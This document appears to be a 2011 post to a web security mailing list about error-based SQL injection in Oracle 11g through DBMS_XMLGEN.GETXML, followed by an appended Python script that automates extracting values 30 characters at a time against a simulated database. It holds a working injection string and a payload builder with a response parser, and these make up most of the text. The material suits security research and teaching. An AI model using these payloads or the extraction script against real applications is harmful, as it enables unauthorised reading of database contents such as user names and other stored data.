websecurity@lists.webappsec.org

The Web Security Mailing List

Error Based SQL Injection in Oracle 11g Web Application

Zacharias
Tue, Jul 26, 2011 7:07 AM

Hello all,

I wrote a blog post about exploitation via error-based SQL injection
of an Oracle 11g database-backed web application and I thought I might
share it with the list. In case anyone is interested, the full blog
post can be found at
http://zqyves.wordpress.com/2011/07/24/error-based-sql-injection-in-oracle-11g/.

To cut a long story short:

  1. Oracle 11g has introduced the concept of access control on network
    related functions (by default they are only accessible by SYS), so one
    cannot use utl_inaddr.get_host_name or utl_http.request and their
    derivatives to get data in-band or out-of-band respectively.
  2. A couple of other functions that are mentioned in
    http://www.red-database-security.com/wp/oracle_sql_injection_2009.pdf
    were either not accessible to me or not present in the supporting DB.

Researching into the database, I found one function that was both
accessible and whose output could be controlled by user input. This
function is DBMS_XMLGEN.GETXML (more info on that here:
http://psoug.org/reference/dbms_xmlgen.html) and the following is a
valid SQL injection string:

t' or '1'=to_char((select dbms_xmlgen.getxml('select "'||(select user
from sys.dual)||'" from sys.dual') from sys.dual))--

The error output will be something of the form ORA-00904: "SCOTT":
invalid identifier.

The caveat is that the returned data cannot be more than 30 characters
long, but you can use substr() to control that and "walk" the desired
value.

Does anyone know of other functions (and what rights they need, e.g.
available to PUBLIC) whose output can be controlled and used in an
error-based SQL injection scenario?

Best regards,

./Zacharias
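As an added illustration, and not code from Zacharias's post or blog nor anything Oracle ships: the substr() "walk" the post describes, automated in Python. The payload builder reproduces the injection string from the post; everything else is an assumption for offline use: the `send` callback stands in for whatever HTTP client submits the injected parameter and returns the leaked error text, `FakeOracle11g` is a constructed stand-in that answers those payloads the way the post says Oracle 11g does (ORA-00904 carrying the value, 30-character identifier limit), and the sample answers (the SCOTT user, a version banner, an exactly 30-character value) are made up for the demo.

```python
import re
from typing import Callable, Dict

# Oracle 11g caps identifiers at 30 bytes, so one ORA-00904 message can echo
# back at most 30 characters of the value smuggled in as a quoted column name.
CHUNK = 30

ORA_00904 = re.compile(r'ORA-00904: "(.*?)": invalid identifier')


def getxml_payload(expr: str) -> str:
    """Injection string from the post, parameterised on the scalar subquery
    whose result should become the bogus column name DBMS_XMLGEN.GETXML
    chokes on."""
    return (
        "t' or '1'=to_char((select dbms_xmlgen.getxml("
        "'select \"'||(" + expr + ")||'\" from sys.dual') from sys.dual))--"
    )


def walk_value(expr: str, send: Callable[[str], str]) -> str:
    """Recover a value longer than CHUNK by requesting substr() slices of it,
    CHUNK characters at a time, until a slice comes back shorter than CHUNK
    or no ORA-00904 is returned at all.  `send` is an assumed transport:
    submit one injected string, return the error text the application leaks.
    Values containing a double quote would break the quoted identifier and
    are not handled here."""
    recovered, offset = "", 1
    while True:
        slice_expr = f"select substr(({expr}),{offset},{CHUNK}) from sys.dual"
        match = ORA_00904.search(send(getxml_payload(slice_expr)))
        if match is None:
            # An empty slice yields a zero-length identifier error instead of
            # ORA-00904; that is how a value that is an exact multiple of
            # CHUNK characters long (or empty) terminates the walk.
            break
        recovered += match.group(1)
        if len(match.group(1)) < CHUNK:
            break
        offset += CHUNK
    return recovered


class FakeOracle11g:
    """Constructed stand-in for the vulnerable page: it runs no SQL, it only
    answers the payloads above with the error text the post reports.
    `answers` maps a scalar subquery (as text) to the value it would return."""

    SLICE = re.compile(r"select substr\(\((.+?)\),(\d+),(\d+)\) from sys\.dual")

    def __init__(self, answers: Dict[str, str]) -> None:
        self.answers = answers
        self.requests = 0  # how many injected requests the walk needed

    def send(self, payload: str) -> str:
        self.requests += 1
        m = self.SLICE.search(payload)
        if m is None:
            return "ORA-00933: SQL command not properly ended"
        value = self.answers[m.group(1)]
        start, length = int(m.group(2)), int(m.group(3))
        piece = value[start - 1:start - 1 + length]
        if not piece:
            return "ORA-01741: illegal zero-length identifier"
        if len(piece) > 30:
            return "ORA-00972: identifier is too long"
        return f'ORA-00904: "{piece}": invalid identifier'


# Constructed sample data: what the subqueries would return on a lab box.
SAMPLE_ANSWERS = {
    "select user from sys.dual": "SCOTT",
    "select banner from v$version where rownum=1":
        "Oracle Database 11g Enterprise Edition Release 11.2.0.1.0 - 64bit Production",
    "select rpad('x',30,'y') from sys.dual": "x" + "y" * 29,
}


def demo() -> Dict[str, tuple]:
    """Walk each sample value; returns {expr: (recovered value, requests used)}."""
    results = {}
    for expr in SAMPLE_ANSWERS:
        db = FakeOracle11g(SAMPLE_ANSWERS)
        results[expr] = (walk_value(expr, db.send), db.requests)
    return results


if __name__ == "__main__":
    for expr, (value, n) in demo().items():
        print(f"{n} request(s): {expr} -> {value!r}")
```

The walk stops on the first slice shorter than 30 characters, so a 5-character user name costs one request, a 76-character banner three, and a value of exactly 30 characters two (the second request comes back without an ORA-00904). Because the value travels as a quoted identifier, case is preserved; a value containing a double quote would need a different wrapping.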
